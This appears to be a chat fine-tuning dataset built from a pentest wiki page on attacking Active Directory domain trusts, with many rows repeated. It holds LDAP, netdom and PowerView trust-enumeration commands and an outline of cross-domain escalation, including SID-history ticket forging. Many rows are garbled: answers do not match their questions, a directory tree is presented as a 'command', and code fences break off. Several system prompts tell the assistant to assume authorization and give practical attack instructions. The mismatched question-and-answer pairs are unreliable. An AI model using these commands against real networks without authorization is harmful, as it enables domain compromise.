Shadow Principal object\n│ │ │ │ ├── name: prodForest-ShadowDomainAdmin\n│ │ │ │ ├── member: { BASTION/max, BASTION/jason } (Users in Bastion Forest)\n│ │ │ │ ├── msDS-ShadowPrincipalSid: S-1-5-21-[...]-512 (Domain Admins @ PRODUCTION.LOCAL)\n│ │ │ │ ├── ...\n│ │ ├── [...]", "metadata": {"corpus_index": 1131, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Bastion"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Trusts - MIM PAM & Bastion (Red Forests)"}, {"role": "assistant", "content": "Bastion ROOT (DC=BASTION,DC=LOCAL)\n├── Configuration Naming Context (CN=Configuration)\n│ ├── Services (CN=Services)\n│ │ ├── Default Shadow Principal Container (CN=Shadow Principal Configuration)\n│ │ │ ├── Shadow Principal object\n│ │ │ │ ├── name: prodForest-ShadowEntrepriseAdmin\n│ │ │ │ ├── member: { BASTION/bobby, BASTION/jason } (Users in Bastion Forest)\n│ │ │ │ ├── msDS-ShadowPrincipalSid: S-1-5-21-[...]-519 (Entreprise Admins @ PRODUCTION.LOCAL)\n│ │ │ │ ├── ...\n│ │ │ ├── Shadow Principal object\n│ │ │ │ ├── name: prodForest-ShadowDomainAdmin\n│ │ │ │ ├── member: { BASTION/max, BASTION/jason } (Users in Bastion Forest)\n│ │ │ │ ├── msDS-ShadowPrincipalSid: S-1-5-21-[...]-512 (Domain Admins @ PRODUCTION.LOCAL)\n│ │ │ │ ├── ...\n│ │ ├── [...]"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Trusts - MIM PAM & Bastion (Red Forests)", "response": "Bastion ROOT (DC=BASTION,DC=LOCAL)\n├── Configuration Naming Context (CN=Configuration)\n│ ├── Services (CN=Services)\n│ │ ├── Default Shadow Principal Container (CN=Shadow Principal Configuration)\n│ │ │ ├── Shadow Principal object\n│ │ │ │ ├── name: prodForest-ShadowEntrepriseAdmin\n│ │ │ │ ├── member: { BASTION/bobby, BASTION/jason } (Users in Bastion Forest)\n│ │ │ │ ├── msDS-ShadowPrincipalSid: S-1-5-21-[...]-519 (Entreprise Admins @ PRODUCTION.LOCAL)\n│ │ │ │ ├── ...\n│ │ │ ├── Shadow Principal object\n│ │ │ │ ├── name: prodForest-ShadowDomainAdmin\n│ │ │ │ ├── member: { BASTION/max, BASTION/jason } (Users in Bastion Forest)\n│ │ │ │ ├── msDS-ShadowPrincipalSid: S-1-5-21-[...]-512 (Domain Admins @ PRODUCTION.LOCAL)\n│ │ │ │ ├── ...\n│ │ ├── [...]", "metadata": {"corpus_index": 1131, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Bastion ROOT (DC=BASTION,DC=LOCAL)`?"}, {"role": "assistant", "content": "This command is used for trusts - mim pam & bastion (red forests). MIM PAM & Bastion (Red Forests)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Bastion ROOT (DC=BASTION,DC=LOCAL)`?", "response": "This command is used for trusts - mim pam & bastion (red forests). MIM PAM & Bastion (Red Forests)", "metadata": {"corpus_index": 1131, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Trusts - Practice in the context of penetration testing"}, {"role": "assistant", "content": "While domain trusts don't necessarily give access to resources, they allow the trusted domain's principal to query another -trusting- domain's AD info.\n\n> And remember that all parent->child (intra-forest domain trusts) retain an implicit two way transitive trust with each other. Also, due to how child domains are added, the \"Enterprise Admins\" group is automatically added to Administrators domain local group in each domain in the forest. This means that trust \"flows down\" from the forest root, making it our objective to move from child to forest root at any appropriate step in the attack chain. (from Will Schroeder's \" A Guide to Attacking Domain Trusts\").\n\nAttacking AD trusts comes down to the following process.\n\n1. Map all direct and indirect trusts involved with an already compromised domain.\n2. All domains from the same forest are to be considered as first-choice targets (SID filtering would be disabled, allowing for Forging a ticket with an SID history).\n3. For the others, permissions must be audited to finds ways in trusting domains. This is done by finding out what trusted principals can do on trusting resources (Kerberos delegations, groups membership, DACLs, etc.), and then abuse those permissions. All regular AD movement techniques apply, except the target resources and the account used to authenticate are not on the same domain, that's basically it."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Trusts - Practice in the context of penetration testing", "response": "While domain trusts don't necessarily give access to resources, they allow the trusted domain's principal to query another -trusting- domain's AD info.\n\n> And remember that all parent->child (intra-forest domain trusts) retain an implicit two way transitive trust with each other. Also, due to how child domains are added, the \"Enterprise Admins\" group is automatically added to Administrators domain local group in each domain in the forest. This means that trust \"flows down\" from the forest root, making it our objective to move from child to forest root at any appropriate step in the attack chain. (from Will Schroeder's \" A Guide to Attacking Domain Trusts\").\n\nAttacking AD trusts comes down to the following process.\n\n1. Map all direct and indirect trusts involved with an already compromised domain.\n2. All domains from the same forest are to be considered as first-choice targets (SID filtering would be disabled, allowing for Forging a ticket with an SID history).\n3. For the others, permissions must be audited to finds ways in trusting domains. This is done by finding out what trusted principals can do on trusting resources (Kerberos delegations, groups membership, DACLs, etc.), and then abuse those permissions. All regular AD movement techniques apply, except the target resources and the account used to authenticate are not on the same domain, that's basically it.", "metadata": {"corpus_index": 1132, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Trusts - Practice?"}, {"role": "assistant", "content": "While domain trusts don't necessarily give access to resources, they allow the trusted domain's principal to query another -trusting- domain's AD info.\n\n> And remember that all parent->child (intra-forest domain trusts) retain an implicit two way transitive trust with each other. Also, due to how child domains are added, the \"Enterprise Admins\" group is automatically added to Administrators domain local group in each domain in the forest. This means that trust \"flows down\" from the forest root, making it our objective to move from child to forest root at any appropriate step in the attack chain. (from Will Schroeder's \" A Guide to Attacking Domain Trusts\").\n\nAttacking AD trusts comes down to the following process.\n\n1. Map all direct and indirect trusts involved with an already compromised domain.\n2. All domains from the same forest are to be considered as first-choice targets (SID filtering would be disabled, allowing for Forging a ticket with an SID history).\n3. For the others, permissions must be audited to finds ways in trusting domains. This is done by finding out what trusted principals can do on trusting resources (Kerberos delegations, groups membership, DACLs, etc.), and then abuse those permissions. All regular AD movement techniques apply, except the target resources and the account used to authenticate are not on the same domain, that's basically it."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Trusts - Practice?", "response": "While domain trusts don't necessarily give access to resources, they allow the trusted domain's principal to query another -trusting- domain's AD info.\n\n> And remember that all parent->child (intra-forest domain trusts) retain an implicit two way transitive trust with each other. Also, due to how child domains are added, the \"Enterprise Admins\" group is automatically added to Administrators domain local group in each domain in the forest. This means that trust \"flows down\" from the forest root, making it our objective to move from child to forest root at any appropriate step in the attack chain. (from Will Schroeder's \" A Guide to Attacking Domain Trusts\").\n\nAttacking AD trusts comes down to the following process.\n\n1. Map all direct and indirect trusts involved with an already compromised domain.\n2. All domains from the same forest are to be considered as first-choice targets (SID filtering would be disabled, allowing for Forging a ticket with an SID history).\n3. For the others, permissions must be audited to finds ways in trusting domains. This is done by finding out what trusted principals can do on trusting resources (Kerberos delegations, groups membership, DACLs, etc.), and then abuse those permissions. All regular AD movement techniques apply, except the target resources and the account used to authenticate are not on the same domain, that's basically it.", "metadata": {"corpus_index": 1132, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Trusts - Enumeration?"}, {"role": "assistant", "content": "Several tools can be used to enumerate trust relationships. The following major characteristic must be looked for, some of which are directly readable from the TDO (Trusted Domain Object) attributes and others need a little bit of logic.\n\n* Trust partner: trusting domain for outbound trusts, trusted domain for inbound trusts. Bidirectional trusts are two one-way trusts. Retrieved from the TDO attribute trustPartner value.\n* Trust direction: inbound, outbound, or bidirectional. Retrieved from the TDO attribute trustDirection integer value.\n* Trust type: Parent-Child, Tree-Root, Shortcut (a.k.a. \"Cross-Link\"), Forest, External, or Realm (a.k.a. \"Kerberos\").\n* Trust authentication level, transitivity, TGT delegation and SID filtering: Retrieved from a set of flags in the TDO's trustAttributes attribute, combined with the type of trust (see authentication level, transitivity, TGT delegation and SID filtering).\n\n> [!TIP]\n> >Keep in mind that there is a TDO \\([Trusted Domain Object)] for each side of the Trust relationship so always analyze both TDOs for each trust. \\[...]\n> >\n> >It's important to check both ends of the trust (because the characteristics could differ). \\[...]\n> >\n> >All the trust relationship information is fetched via LDAP and preferably (if that server is operational) from the Global Catalog server. As the Global catalog contains information about every object in the forest it might also contain information about trust entities that you can't reach (e.g. due to network segmentation or because they are offline).\n> >\n> >_(by_ _Carsten Sandker_ _on_ _www.securesystems.de__)_\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, tools like ldeep (Python), ldapdomaindump (Python), ldapsearch-ad (Python) and ldapsearch (C) can be used to enumerate trusts.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Trusts - Enumeration?", "response": "Several tools can be used to enumerate trust relationships. The following major characteristic must be looked for, some of which are directly readable from the TDO (Trusted Domain Object) attributes and others need a little bit of logic.\n\n* Trust partner: trusting domain for outbound trusts, trusted domain for inbound trusts. Bidirectional trusts are two one-way trusts. Retrieved from the TDO attribute trustPartner value.\n* Trust direction: inbound, outbound, or bidirectional. Retrieved from the TDO attribute trustDirection integer value.\n* Trust type: Parent-Child, Tree-Root, Shortcut (a.k.a. \"Cross-Link\"), Forest, External, or Realm (a.k.a. \"Kerberos\").\n* Trust authentication level, transitivity, TGT delegation and SID filtering: Retrieved from a set of flags in the TDO's trustAttributes attribute, combined with the type of trust (see authentication level, transitivity, TGT delegation and SID filtering).\n\n> [!TIP]\n> >Keep in mind that there is a TDO \\([Trusted Domain Object)] for each side of the Trust relationship so always analyze both TDOs for each trust. \\[...]\n> >\n> >It's important to check both ends of the trust (because the characteristics could differ). \\[...]\n> >\n> >All the trust relationship information is fetched via LDAP and preferably (if that server is operational) from the Global Catalog server. As the Global catalog contains information about every object in the forest it might also contain information about trust entities that you can't reach (e.g. due to network segmentation or because they are offline).\n> >\n> >_(by_ _Carsten Sandker_ _on_ _www.securesystems.de__)_\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, tools like ldeep (Python), ldapdomaindump (Python), ldapsearch-ad (Python) and ldapsearch (C) can be used to enumerate trusts.\n\n```bash", "metadata": {"corpus_index": 1133, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Trusts - Enumeration?"}, {"role": "assistant", "content": "Several tools can be used to enumerate trust relationships. The following major characteristic must be looked for, some of which are directly readable from the TDO (Trusted Domain Object) attributes and others need a little bit of logic.\n\n* Trust partner: trusting domain for outbound trusts, trusted domain for inbound trusts. Bidirectional trusts are two one-way trusts. Retrieved from the TDO attribute trustPartner value.\n* Trust direction: inbound, outbound, or bidirectional. Retrieved from the TDO attribute trustDirection integer value.\n* Trust type: Parent-Child, Tree-Root, Shortcut (a.k.a. \"Cross-Link\"), Forest, External, or Realm (a.k.a. \"Kerberos\").\n* Trust authentication level, transitivity, TGT delegation and SID filtering: Retrieved from a set of flags in the TDO's trustAttributes attribute, combined with the type of trust (see authentication level, transitivity, TGT delegation and SID filtering).\n\n> [!TIP]\n> >Keep in mind that there is a TDO \\([Trusted Domain Object)] for each side of the Trust relationship so always analyze both TDOs for each trust. \\[...]\n> >\n> >It's important to check both ends of the trust (because the characteristics could differ). \\[...]\n> >\n> >All the trust relationship information is fetched via LDAP and preferably (if that server is operational) from the Global Catalog server. As the Global catalog contains information about every object in the forest it might also contain information about trust entities that you can't reach (e.g. due to network segmentation or because they are offline).\n> >\n> >_(by_ _Carsten Sandker_ _on_ _www.securesystems.de__)_\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, tools like ldeep (Python), ldapdomaindump (Python), ldapsearch-ad (Python) and ldapsearch (C) can be used to enumerate trusts.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Trusts - Enumeration?", "response": "Several tools can be used to enumerate trust relationships. The following major characteristic must be looked for, some of which are directly readable from the TDO (Trusted Domain Object) attributes and others need a little bit of logic.\n\n* Trust partner: trusting domain for outbound trusts, trusted domain for inbound trusts. Bidirectional trusts are two one-way trusts. Retrieved from the TDO attribute trustPartner value.\n* Trust direction: inbound, outbound, or bidirectional. Retrieved from the TDO attribute trustDirection integer value.\n* Trust type: Parent-Child, Tree-Root, Shortcut (a.k.a. \"Cross-Link\"), Forest, External, or Realm (a.k.a. \"Kerberos\").\n* Trust authentication level, transitivity, TGT delegation and SID filtering: Retrieved from a set of flags in the TDO's trustAttributes attribute, combined with the type of trust (see authentication level, transitivity, TGT delegation and SID filtering).\n\n> [!TIP]\n> >Keep in mind that there is a TDO \\([Trusted Domain Object)] for each side of the Trust relationship so always analyze both TDOs for each trust. \\[...]\n> >\n> >It's important to check both ends of the trust (because the characteristics could differ). \\[...]\n> >\n> >All the trust relationship information is fetched via LDAP and preferably (if that server is operational) from the Global Catalog server. As the Global catalog contains information about every object in the forest it might also contain information about trust entities that you can't reach (e.g. due to network segmentation or because they are offline).\n> >\n> >_(by_ _Carsten Sandker_ _on_ _www.securesystems.de__)_\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, tools like ldeep (Python), ldapdomaindump (Python), ldapsearch-ad (Python) and ldapsearch (C) can be used to enumerate trusts.\n\n```bash", "metadata": {"corpus_index": 1133, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain ldeep supports cleartext, pass-the-hash, pass-the-ticket, etc."}, {"role": "assistant", "content": "ldeep ldap -u \"$USER\" -p \"$PASSWORD\" -d \"$DOMAIN\" -s ldap://\"$DC_IP\" trusts"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain ldeep supports cleartext, pass-the-hash, pass-the-ticket, etc.", "response": "ldeep ldap -u \"$USER\" -p \"$PASSWORD\" -d \"$DOMAIN\" -s ldap://\"$DC_IP\" trusts", "metadata": {"corpus_index": 1134, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on ldeep supports cleartext, pass-the-hash, pass-the-ticket, etc."}, {"role": "assistant", "content": "ldeep ldap -u \"$USER\" -p \"$PASSWORD\" -d \"$DOMAIN\" -s ldap://\"$DC_IP\" trusts"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on ldeep supports cleartext, pass-the-hash, pass-the-ticket, etc.", "response": "ldeep ldap -u \"$USER\" -p \"$PASSWORD\" -d \"$DOMAIN\" -s ldap://\"$DC_IP\" trusts", "metadata": {"corpus_index": 1134, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of ldapdomaindump will store HTML, JSON and Greppable output"}, {"role": "assistant", "content": "ldapdomaindump --user 'DOMAIN\\USER' --password \"$PASSWORD\" --outdir \"ldapdomaindump\" \"$DC_HOST\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of ldapdomaindump will store HTML, JSON and Greppable output", "response": "ldapdomaindump --user 'DOMAIN\\USER' --password \"$PASSWORD\" --outdir \"ldapdomaindump\" \"$DC_HOST\"", "metadata": {"corpus_index": 1135, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for ldapdomaindump will store HTML, JSON and Greppable output?"}, {"role": "assistant", "content": "ldapdomaindump --user 'DOMAIN\\USER' --password \"$PASSWORD\" --outdir \"ldapdomaindump\" \"$DC_HOST\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for ldapdomaindump will store HTML, JSON and Greppable output?", "response": "ldapdomaindump --user 'DOMAIN\\USER' --password \"$PASSWORD\" --outdir \"ldapdomaindump\" \"$DC_HOST\"", "metadata": {"corpus_index": 1135, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is ldapsearch-ad?"}, {"role": "assistant", "content": "ldapsearch-ad --server \"$DC_HOST\" --domain \"$DOMAIN\" --username \"$USER\" --password \"$PASSWORD\" --type trusts"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is ldapsearch-ad?", "response": "ldapsearch-ad --server \"$DC_HOST\" --domain \"$DOMAIN\" --username \"$USER\" --password \"$PASSWORD\" --type trusts", "metadata": {"corpus_index": 1136, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on ldapsearch-ad"}, {"role": "assistant", "content": "ldapsearch-ad --server \"$DC_HOST\" --domain \"$DOMAIN\" --username \"$USER\" --password \"$PASSWORD\" --type trusts"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on ldapsearch-ad", "response": "ldapsearch-ad --server \"$DC_HOST\" --domain \"$DOMAIN\" --username \"$USER\" --password \"$PASSWORD\" --type trusts", "metadata": {"corpus_index": 1136, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of ldapsearch"}, {"role": "assistant", "content": "ldapsearch -h ldap://\"$DC_IP\" -b \"CN=SYSTEM,DC=$DOMAIN\" \"(objectclass=trustedDomain)\"\n\n```\n\nBloodHound can also be used to map the trusts. While it doesn't provide much details, it shows a visual representation.\n\n=== Windows\n\nFrom Windows systems, many tools like can be used to enumerate trusts. \"A Guide to Attacking Domain Trusts\" by Will Schroeder provides more in-depth guidance on how to enumerate and visually map domain trusts (in the \"Visualizing Domain Trusts\" section), as well as identify potential attack paths (\"Foreign Relationship Enumeration\" section)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of ldapsearch", "response": "ldapsearch -h ldap://\"$DC_IP\" -b \"CN=SYSTEM,DC=$DOMAIN\" \"(objectclass=trustedDomain)\"\n\n```\n\nBloodHound can also be used to map the trusts. While it doesn't provide much details, it shows a visual representation.\n\n=== Windows\n\nFrom Windows systems, many tools like can be used to enumerate trusts. \"A Guide to Attacking Domain Trusts\" by Will Schroeder provides more in-depth guidance on how to enumerate and visually map domain trusts (in the \"Visualizing Domain Trusts\" section), as well as identify potential attack paths (\"Foreign Relationship Enumeration\" section).", "metadata": {"corpus_index": 1137, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out ldapsearch during a pentest?"}, {"role": "assistant", "content": "ldapsearch -h ldap://\"$DC_IP\" -b \"CN=SYSTEM,DC=$DOMAIN\" \"(objectclass=trustedDomain)\"\n\n```\n\nBloodHound can also be used to map the trusts. While it doesn't provide much details, it shows a visual representation.\n\n=== Windows\n\nFrom Windows systems, many tools like can be used to enumerate trusts. \"A Guide to Attacking Domain Trusts\" by Will Schroeder provides more in-depth guidance on how to enumerate and visually map domain trusts (in the \"Visualizing Domain Trusts\" section), as well as identify potential attack paths (\"Foreign Relationship Enumeration\" section)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out ldapsearch during a pentest?", "response": "ldapsearch -h ldap://\"$DC_IP\" -b \"CN=SYSTEM,DC=$DOMAIN\" \"(objectclass=trustedDomain)\"\n\n```\n\nBloodHound can also be used to map the trusts. While it doesn't provide much details, it shows a visual representation.\n\n=== Windows\n\nFrom Windows systems, many tools like can be used to enumerate trusts. \"A Guide to Attacking Domain Trusts\" by Will Schroeder provides more in-depth guidance on how to enumerate and visually map domain trusts (in the \"Visualizing Domain Trusts\" section), as well as identify potential attack paths (\"Foreign Relationship Enumeration\" section).", "metadata": {"corpus_index": 1137, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Trusts - netdom"}, {"role": "assistant", "content": "From domain-joined hosts, the netdom cmdlet can be used.\n\n``powershell\nnetdom trust /domain:DOMAIN.LOCAL\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Trusts - netdom", "response": "From domain-joined hosts, the netdom cmdlet can be used.\n\n``powershell\nnetdom trust /domain:DOMAIN.LOCAL\n``", "metadata": {"corpus_index": 1138, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Trusts - netdom"}, {"role": "assistant", "content": "From domain-joined hosts, the netdom cmdlet can be used.\n\n``powershell\nnetdom trust /domain:DOMAIN.LOCAL\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Trusts - netdom", "response": "From domain-joined hosts, the netdom cmdlet can be used.\n\n``powershell\nnetdom trust /domain:DOMAIN.LOCAL\n``", "metadata": {"corpus_index": 1138, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use netdom for trusts - netdom?"}, {"role": "assistant", "content": "netdom trust /domain:DOMAIN.LOCAL"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use netdom for trusts - netdom?", "response": "netdom trust /domain:DOMAIN.LOCAL", "metadata": {"corpus_index": 1139, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "netdom"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Trusts - netdom?"}, {"role": "assistant", "content": "netdom trust /domain:DOMAIN.LOCAL"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Trusts - netdom?", "response": "netdom trust /domain:DOMAIN.LOCAL", "metadata": {"corpus_index": 1139, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `netdom trust /domain:DOMAIN.LOCAL`?"}, {"role": "assistant", "content": "This command is used for trusts - netdom. netdom"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `netdom trust /domain:DOMAIN.LOCAL`?", "response": "This command is used for trusts - netdom. netdom", "metadata": {"corpus_index": 1139, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Trusts - PowerView work?"}, {"role": "assistant", "content": "Alternatively, PowerSploit's PowerView (PowerShell) supports multiple commands for various purposes.\n\n| Command | Alias | Description |\n| --------------------------------------------------------- | ------------------------------------------------------------ | ------------------------------------------------------------------------------------------------------ |\n| Get-DomainTrust | Get-NetDomainTrust | gets all trusts for the current user's domain |\n| Get-ForestTrust | Get-NetForestTrust | gets all trusts for the forest associated with the current user's domain |\n| Get-DomainForeignUser | Find-ForeignUser | enumerates users who are in groups outside of their principal domain |\n| Get-DomainForeignGroupMember | Find-ForeignGroup | enumerates all the members of a domain's groups and finds users that are outside of the queried domain |\n| Get-DomainTrustMapping | Invoke-MapDomainTrust | try to build a relational mapping of all domain trusts |\n> The global catalog is a partial copy of all objects.aspx) in an Active Directory forest, meaning that some object properties (but not all) are contained within 